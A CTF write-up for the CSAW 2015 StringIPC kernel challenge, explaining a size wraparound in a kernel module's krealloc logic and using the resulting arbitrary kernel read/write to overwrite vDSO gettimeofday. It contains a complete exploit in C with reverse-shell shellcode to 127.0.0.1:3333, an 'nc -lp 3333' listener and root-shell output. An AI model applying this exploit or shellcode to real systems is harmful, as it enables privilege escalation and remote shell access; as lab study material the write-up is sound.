
Playing with vDSO!


Each team was presented with unprivileged access to a Digital Ocean droplet running 64-bit Ubuntu 14.04.3 LTS.  The vulnerable kernel module StringIPC.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag.

CSAW CTF 2015 Kernel Exploitation Challenge

This is a kernel PWN (500 pt) challenge. KASLR, SMEP and SMAP were enabled. Only the source code of a vulnerable LKM was provided, which you can download here. I solved this challenge together with @kaanezder.


According to the challenge author, Michael Coppola,

StringIPC is a kernel module providing a terrible IPC interface allowing processes to pass strings to one another.

CSAW CTF 2015 Kernel Exploitation Challenge

By issuing ioctl() calls on /dev/csaw, we can:

  • Allocate a new IPC channel;
  • Open an existing IPC channel;
  • Resize an IPC channel;
  • Read from/Write to an IPC channel;
  • Set/Get “where we are” inside an IPC channel buffer (just like fseek() does);
  • Close an IPC channel.

The vulnerability resides in the resizing function (namely CSAW_GROW_CHANNEL and CSAW_SHRINK_CHANNEL). Let’s take a closer look at it:

static int realloc_ipc_channel ( struct ipc_state *state, int id, size_t size, int grow )
{
    struct ipc_channel *channel;
    size_t new_size;
    char *new_data;

    channel = get_channel_by_id(state, id);
    if ( IS_ERR(channel) )
        return PTR_ERR(channel);

    if ( grow )
        new_size = channel->buf_size + size;
    else
        new_size = channel->buf_size - size;

    new_data = krealloc(channel->data, new_size + 1, GFP_KERNEL);
    if ( new_data == NULL )
        return -EINVAL;

    channel->data = new_data;
    channel->buf_size = new_size;

    ipc_channel_put(state, channel);

    return 0;
}

krealloc() is defined in mm/slab_common.c:

/**
 * krealloc - reallocate memory. The contents will remain unchanged.
 * @p: object to reallocate memory for.
 * @new_size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * The contents of the object pointed to are preserved up to the
 * lesser of the new and old sizes.  If @p is %NULL, krealloc()
 * behaves exactly like kmalloc().  If @new_size is 0 and @p is not a
 * %NULL pointer, the object pointed to is freed.
 */
void *krealloc(const void *p, size_t new_size, gfp_t flags)
{
	void *ret;

	if (unlikely(!new_size)) {
		kfree(p);
		return ZERO_SIZE_PTR;
	}

	ret = __do_krealloc(p, new_size, flags);
	if (ret && p != ret)
		kfree(p);

	return ret;
}
EXPORT_SYMBOL(krealloc);

As we can see, when new_size is zero, krealloc() returns ZERO_SIZE_PTR (defined in include/linux/slab.h):

/*
 * ZERO_SIZE_PTR will be returned for zero sized kmalloc requests.
 *
 * Dereferencing ZERO_SIZE_PTR will lead to a distinct access fault.
 *
 * ZERO_SIZE_PTR can be passed to kfree though in the same way that NULL can.
 * Both make kfree a no-op.
 */
#define ZERO_SIZE_PTR ((void *)16)

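However, realloc_ipc_channel() rejects a resizing request only when krealloc() returns NULL (see line 181), and it never checks new_size for wraparound. If we make new_size wrap around to -1 (0xffffffffffffffff, since buf_size is an unsigned size_t), then new_size + 1 is 0, krealloc() returns ZERO_SIZE_PTR instead of NULL, and the check passes. We end up with a channel whose data pointer is 0x10 and whose size is effectively infinite. Arbitrary read-write!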
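The wraparound is easy to check in user space. The sketch below only models the size arithmetic of realloc_ipc_channel(); the helper names are mine and do not exist in the module, and size_t is assumed to be 64 bits wide as on the target. The last helper is one possible guard, not the challenge author's fix.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: mirrors the unchecked new_size computation. */
size_t model_new_size(size_t buf_size, size_t size, int grow)
{
    return grow ? buf_size + size : buf_size - size;   /* wraps silently */
}

/* Hypothetical helper: the size that ends up being passed to krealloc(). */
size_t model_krealloc_request(size_t new_size)
{
    return new_size + 1;   /* SIZE_MAX + 1 wraps to 0 */
}

/*
 * One possible guard (an assumption, not taken from the module):
 * returns 0 and stores the new size, or -1 if the arithmetic would wrap.
 */
int checked_new_size(size_t buf_size, size_t size, int grow, size_t *out)
{
    if (grow) {
        if (size >= SIZE_MAX - buf_size)   /* buf_size + size + 1 would wrap */
            return -1;
        *out = buf_size + size;
    } else {
        if (size > buf_size)               /* buf_size - size would wrap */
            return -1;
        *out = buf_size - size;
    }
    return 0;
}
```

With buf_size = 0x2000, growing by 0xffffffffffffffff - 0x2000 (what the exploit below does) or shrinking by 0x2001 both give new_size = 0xffffffffffffffff and a krealloc() request of 0 bytes.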


Now, how to get root? Of course, one way to do that is to overwrite our struct cred directly. This time, however, I would like to try a different way, namely hijacking vDSO.

First of all, what is vDSO? I’m sure you’ve seen it when using vmmap in your favorite GDB plugin:

gef➤ vmmap vdso
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x  [vdso]

Hmm…Let’s dump it out:

gef➤ dump binary memory vdso.dump 0x00007ffff7ffa000 0x00007ffff7ffc000
gef➤ quit
peilin@PWN:~/expr/vdso$ file vdso.dump
vdso.dump: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e34da8d8d1df68c59ef4339cbfc9dc8d24316724, stripped

Oh my, it’s an ELF binary!

peilin@PWN:~/expr/vdso$ readelf -s vdso.dump | grep "__vdso_"
     3: 0000000000000c60   333 FUNC    GLOBAL DEFAULT   12 __vdso_gettimeofday@@LINUX_2.6
     5: 0000000000000db0    21 FUNC    GLOBAL DEFAULT   12 __vdso_time@@LINUX_2.6
     7: 0000000000000a10   582 FUNC    GLOBAL DEFAULT   12 __vdso_clock_gettime@@LINUX_2.6
     9: 0000000000000dd0    42 FUNC    GLOBAL DEFAULT   12 __vdso_getcpu@@LINUX_2.6

According to Wikipedia:

vDSO (virtual dynamic shared object) is a Linux kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

vDSO – Wikipedia

Roughly speaking, vDSO is an ELF binary embedded in the kernel image, containing several heavily-used, time-critical kernel routines. When creating a user process, the kernel also maps vDSO into its address space, so that the user program can call, say, gettimeofday(), as if it were a libc function. No need to make a slow system call anymore!
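You don't need GDB to convince yourself of this. Here is a minimal sketch that asks the kernel where it mapped vDSO (via the AT_SYSINFO_EHDR auxiliary vector entry) and checks for the ELF magic. The function name is made up for this post, and I'm assuming Linux with a libc that provides getauxval().

```c
#include <elf.h>
#include <string.h>
#include <sys/auxv.h>

/*
 * Returns 1 if the vDSO mapped into this process starts with the ELF magic,
 * 0 if it does not, and -1 if the kernel did not report a vDSO at all.
 */
int vdso_looks_like_elf(void)
{
    unsigned long base = getauxval(AT_SYSINFO_EHDR);

    if (base == 0)
        return -1;   /* no vDSO advertised in the auxiliary vector */

    /* ELFMAG is "\177ELF" and SELFMAG is 4, both from <elf.h> */
    return memcmp((const void *)base, ELFMAG, SELFMAG) == 0 ? 1 : 0;
}
```

On an ordinary x86-64 Linux box I would expect this to return 1, matching what file(1) said about the dump above.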


Back to our attack. Here’s the plan:

  • Using our arbitrary read ability, we find out where vDSO is within the randomized kernel address space;
  • Using our arbitrary write ability, we overwrite gettimeofday() with reverse shell shellcode;
  • We wait until a process running with root privileges calls gettimeofday();
  • We catch that reverse root shell!

vDSO is page-aligned. I decided to locate it by searching for the __vdso_gettimeofday string.
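The search itself is simple enough to try on an ordinary buffer first. This is a sketch of the idea only: the function name and the PAGE_SIZE_ASSUMED constant are mine, and it scans a user-space buffer instead of kernel memory read through the channel.

```c
#include <stddef.h>
#include <string.h>

#define PAGE_SIZE_ASSUMED 0x1000u   /* assumption: 4 KiB pages */

/*
 * Walk `mem` one page at a time and return the offset of the first page
 * that has `needle` (terminating NUL included) at `needle_off`, or -1.
 */
long find_page_with_string(const unsigned char *mem, size_t len,
                           size_t needle_off, const char *needle)
{
    size_t n = strlen(needle) + 1;   /* compare the NUL too, like strcmp() */

    for (size_t page = 0; page + needle_off + n <= len; page += PAGE_SIZE_ASSUMED) {
        if (memcmp(mem + page + needle_off, needle, n) == 0)
            return (long)page;
    }
    return -1;
}
```

Only one comparison per page is needed because the string sits at a fixed offset from the page-aligned start of vDSO. That offset depends on the kernel build, so it has to be taken from the target's own vDSO.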

Don’t forget vDSO is also readable from user space. Let’s first dump it out:

#include <fcntl.h>
#include <stdio.h>
#include <sys/auxv.h> 
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(void)
{
	unsigned long vdso = getauxval(AT_SYSINFO_EHDR);

	if (vdso != 0) {
		for (int i = 0; i < 0x2000; i++)
			printf("%02x ", *(unsigned char *)(vdso + i));
	}
	return 0;
}

Then:

peilin@PWN:~/csaw-finals-2015/stringipc$ xxd -r -p vdso.dump vdso.bin
peilin@PWN:~/csaw-finals-2015/stringipc$ file vdso.bin
vdso.bin: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=b7acc30c6c7414a0d4eb6b8645e633acfc0eae6a, stripped
peilin@PWN:~/csaw-finals-2015/stringipc$ strings -t x vdso.bin | grep "__vdso_gettimeofday"
    2c6 __vdso_gettimeofday

Now we know that we can find the string at offset 0x2c6…

gef➤ p __vdso_gettimeofday
$1 = {<text variable, no debug info>} 0xc80 <gettimeofday>

…and we should write our shellcode to offset 0xc80.

This shellcode drops off a reverse shell at localhost:3333 if run with root privilege.
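If you'd rather not trust a blob of bytes blindly, the address and port can be read straight out of it. In the shellcode used in the exploit below, two 8-byte immediates are loaded with mov and then flipped with not before being pushed. The sketch below undoes that encoding; the array and function names are mine, and the bytes are copied from the shellcode string.

```c
#include <stddef.h>
#include <stdint.h>

/* Immediate of `mov rcx, imm64` (48 B9 ...), followed by `not rcx` in the shellcode */
const uint8_t enc_sockaddr[8] = {0xFD, 0xFF, 0xF2, 0xFA, 0x80, 0xFF, 0xFF, 0xFE};
/* Immediate of `mov rbx, imm64` (48 BB ...), followed by `not rbx` in the shellcode */
const uint8_t enc_path[8]     = {0xD0, 0x9D, 0x96, 0x91, 0xD0, 0x8C, 0x97, 0xFF};

/* Undo the bitwise-NOT encoding, one byte at a time. */
void decode_not(const uint8_t *in, uint8_t *out, size_t n)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)~in[i];
}

/* Port of a decoded sockaddr_in prefix: bytes 2..3, network byte order. */
unsigned decoded_port(const uint8_t *sa)
{
    return ((unsigned)sa[2] << 8) | sa[3];
}
```

Decoding enc_sockaddr gives 02 00 0d 05 7f 00 00 01, that is AF_INET, port 3333, address 127.0.0.1. Decoding enc_path gives the NUL-terminated string /bin/sh.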


Here’s the full exploit:

/* musl-gcc exp.c -o exp -static */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  (CSAW_IOCTL_BASE + 1)
#define CSAW_GROW_CHANNEL   (CSAW_IOCTL_BASE + 3)
#define CSAW_READ_CHANNEL   (CSAW_IOCTL_BASE + 5)
#define CSAW_WRITE_CHANNEL  (CSAW_IOCTL_BASE + 6)
#define CSAW_SEEK_CHANNEL   (CSAW_IOCTL_BASE + 7)
#define CSAW_CLOSE_CHANNEL  (CSAW_IOCTL_BASE + 8)

#define SEEK_SET	0

typedef unsigned long loff_t;

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

int main(void)
{
    unsigned long r;
    int fd = open("/dev/csaw", O_RDWR);

    if (fd < 0) {
        perror("failed to open /dev/csaw");    /* fd is always -1 here; errno has the reason */
        exit(1);
    }

    /* alloc channel */
    struct alloc_channel_args alloc_channel;
    alloc_channel.buf_size = 0x2000;
    ioctl(fd, CSAW_ALLOC_CHANNEL, &alloc_channel);
    int id = alloc_channel.id;
    printf("[+] channel id: %d\n", id);

    /* grow channel */
    struct grow_channel_args grow_channel;
    grow_channel.id = id;
    grow_channel.size = 0xffffffffffffffff - alloc_channel.buf_size;
    ioctl(fd, CSAW_GROW_CHANNEL, &grow_channel);

    /* leak vdso */
    struct seek_channel_args seek_channel;
    seek_channel.id = id;
    seek_channel.whence = SEEK_SET;

    struct read_channel_args read_channel;
    char *buf = (char *)malloc(alloc_channel.buf_size);
    memset((void *)buf, 0, alloc_channel.buf_size);
    read_channel.id = alloc_channel.id;
    read_channel.buf = buf;
    read_channel.count = 0x2000;

    unsigned long vdso = 0xffffffff81000000;

    for (; vdso < 0xffffffffffffefff; vdso += 0x1000) {
        /* seek channel */
        seek_channel.index = vdso - 0x10;  /* channel->data is now 0x10 */
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        /* read channel */
        ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
        if (!strcmp(buf + 0x2c6, "__vdso_gettimeofday")) {
            printf("[+] kernel vDSO address: %p\n", (void *)vdso);
            break;
        }
    }

    /*
     * https://gist.github.com/itsZN/1ab36391d1849f15b785
     * reverse shell (127.0.0.1:3333)
     */
    char shellcode[] = "\x90\x53\x48\x31\xC0\xB0\x66\x0F\x05\x48\x31\xDB\x48\x39\xC3\x75\x0F\x48\x31\xC0\xB0\x39\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x09\x5B\x48\x31\xC0\xB0\x60\x0F\x05\xC3\x48\x31\xD2\x6A\x01\x5E\x6A\x02\x5F\x6A\x29\x58\x0F\x05\x48\x97\x50\x48\xB9\xFD\xFF\xF2\xFA\x80\xFF\xFF\xFE\x48\xF7\xD1\x51\x48\x89\xE6\x6A\x10\x5A\x6A\x2A\x58\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x07\x48\x31\xC0\xB0\xE7\x0F\x05\x90\x6A\x03\x5E\x6A\x21\x58\x48\xFF\xCE\x0F\x05\x75\xF6\x48\x31\xC0\x50\x48\xBB\xD0\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xD3\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\x48\x31\xD2\xB0\x3B\x0F\x05\x48\x31\xC0\xB0\xE7\x0F\x05";

    /* write shellcode to __vdso_gettimeofday */
    seek_channel.index = vdso - 0x10 + 0xc80;    /* again, channel->data is now 0x10 */
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    struct write_channel_args write_channel;
    write_channel.id = id;
    write_channel.buf = shellcode;
    write_channel.count = sizeof(shellcode) - 1;    /* don't write the string's trailing NUL */
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);

    /* catch that shell! */
    pid_t pid = fork();
    if (pid == 0) {
        printf("[+] waiting for reverse shell...\n");
        system("nc -lp 3333");
        exit(0);    /* the child must not fall through to the cleanup below */
    }
    wait(NULL);

    /* clean up */
    struct close_channel_args close_channel;
    close_channel.id = id;
    ioctl(fd, CSAW_CLOSE_CHANNEL, &close_channel);
    close(fd);
    return 0;
}

Let’s see:

/ $ ./exp
[+] channel id: 1
[+] kernel vDSO address: 0xffffffff83a04000
[+] waiting for reverse shell...
id
uid=0(root) gid=0(root)
whoami
root

Nice!

Note that you may need to simulate your own “cronjob”: a process that runs with root privileges and calls gettimeofday() repeatedly.
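Something as small as the following would do for local testing. It is a sketch, not what ran on the challenge box: the function name is mine, and whether the call actually goes through __vdso_gettimeofday depends on the libc and how the binary is linked (I'm assuming a dynamically linked glibc here).

```c
#include <stddef.h>
#include <sys/time.h>
#include <unistd.h>

/*
 * Call gettimeofday() `rounds` times, sleeping `delay_sec` seconds after
 * each call. Returns the number of calls that succeeded.
 */
int call_gettimeofday_repeatedly(int rounds, unsigned delay_sec)
{
    int ok = 0;

    for (int i = 0; i < rounds; i++) {
        struct timeval tv;

        if (gettimeofday(&tv, NULL) == 0)
            ok++;
        if (delay_sec)
            sleep(delay_sec);
    }
    return ok;
}
```

Call it from a main() started as root, with a large rounds value and a delay of a second or so, and leave it running in the background while the exploit does its work.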


One last thing. A keen reader may ask: Why can’t we just modify vDSO from user space? For example, consider the following program:

/* musl-gcc -o crash -Wl,-znow crash.c */
#include <sys/auxv.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <sys/time.h>

int main(void) {
    struct timeval tv;
    void *vdso = (void *)getauxval(AT_SYSINFO_EHDR);

    printf("vdso: %p\n", vdso);
    mprotect(vdso, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC);
    memset(vdso, 0, 0x2000);

    gettimeofday(&tv, 0);
    printf("tv_sec: %ld\n", tv.tv_sec);
    printf("tv_usec: %ld\n", tv.tv_usec);
    return 0;
}

It mprotect()s vDSO to writable, memset()s it to all zeroes, then calls gettimeofday(). Let’s see what happens:

peilin@PWN:~/expr/vdso$ ./crash
vdso: 0x7ffc03d71000
Segmentation fault

Of course it crashes – gettimeofday() is now all zeroes!

The question is: Why doesn't this affect other processes running on my machine?

Using a program borrowed from this article, I printed out the physical address of vDSO before and after memset():

root@PWN:/home/peilin/expr/vdso# ./phys 2664 0x7ffff7ffa000
getting page number of virtual address 140737354113024 of process 2664
opening pagemap /proc/2664/pagemap
moving to 274877644752
physical frame address is 0x111cb
physical address is 0x111cb000
root@PWN:/home/peilin/expr/vdso# ./phys 2664 0x7ffff7ffa000
getting page number of virtual address 140737354113024 of process 2664
opening pagemap /proc/2664/pagemap
moving to 274877644752
physical frame address is 0x2783b
physical address is 0x2783b000

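It changed! This means all we did was memset() our own private copy of vDSO to all zeroes, not the real one. It seems that once we mprotect() vDSO to writable, our first write triggers copy-on-write (COW): the kernel gives our process a fresh physical page and leaves the shared one untouched.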
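The numbers in that output follow from the layout of /proc/PID/pagemap: one 64-bit entry per virtual page, with the page frame number in bits 0-54 and a "present" flag in bit 63. Here is a sketch of just the arithmetic; the names are mine, not taken from the borrowed program.

```c
#include <stdint.h>

#define PAGEMAP_ENTRY_BYTES 8ULL                  /* one 64-bit entry per virtual page */
#define PAGEMAP_PFN_MASK    ((1ULL << 55) - 1)    /* bits 0-54: page frame number */
#define PAGEMAP_PRESENT     (1ULL << 63)          /* bit 63: page is present in RAM */

/* File offset of the pagemap entry that describes `vaddr`. */
uint64_t pagemap_offset(uint64_t vaddr, uint64_t page_size)
{
    return (vaddr / page_size) * PAGEMAP_ENTRY_BYTES;
}

/* Physical address of the page described by `entry`, or 0 if it is not present. */
uint64_t phys_from_entry(uint64_t entry, uint64_t page_size)
{
    if (!(entry & PAGEMAP_PRESENT))
        return 0;
    return (entry & PAGEMAP_PFN_MASK) * page_size;
}
```

For 0x7ffff7ffa000 with 4 KiB pages the offset is 274877644752, the same value as in the "moving to" lines above, and frame 0x111cb corresponds to physical address 0x111cb000. Recent kernels hide the frame number from unprivileged readers, which is why the tool was run as root.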

In short, we can’t just write our shellcode to vDSO from user space and hope to get a root shell. Not that easy! 🙂


References: